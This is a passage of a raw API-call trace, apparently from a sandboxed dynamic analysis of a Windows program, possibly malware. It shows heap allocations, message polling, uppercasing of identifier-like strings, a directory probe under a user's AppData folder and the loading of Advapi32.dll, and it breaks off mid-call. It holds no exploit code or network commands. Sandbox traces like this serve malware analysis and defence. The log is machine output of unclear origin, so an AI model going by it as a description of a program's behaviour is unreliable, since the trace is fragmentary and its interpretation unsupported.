0 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0198.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0198.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0198.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0198.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0198.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0198.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0198.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0198.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0198.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0198.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0198.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0198.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0198.757] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/PeerDistRepub", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdf9e1b08, ftCreationTime.dwHighDateTime=0x1d32734, ftLastAccessTime.dwLowDateTime=0xd2f40fba, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xdf9e1b08, ftLastWriteTime.dwHighDateTime=0x1d32734, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 0x9e21f8 [0198.787] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0198.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0198.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0198.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0198.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0198.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0198.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0198.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0198.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.789] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0198.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0198.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0198.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0198.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0198.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0198.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0198.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0198.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0198.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0198.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0198.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0198.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0198.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0198.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0198.791] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0198.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0198.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0198.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0198.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0198.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0198.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0198.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0198.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c60 | out: hHeap=0x2af0000) returned 1 [0198.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.792] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0198.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0198.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0198.792] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0198.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0198.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaab28 [0198.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0198.792] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0198.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0198.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0198.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0198.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0198.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0198.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721b8 [0198.792] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0198.792] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0198.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0198.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0198.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0198.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0198.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0198.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0198.793] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0198.793] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722f8 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0198.793] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0198.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0198.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9f0 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0198.793] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0198.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0198.793] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0198.793] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0198.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0198.794] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0198.794] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0198.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0198.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0198.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0198.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0198.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0198.794] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0198.794] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0198.795] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0198.795] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0198.795] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0198.796] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.796] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.796] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0198.796] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0198.796] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0198.796] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0198.796] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0198.796] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0198.797] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0198.797] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0198.797] HeapFree (in: 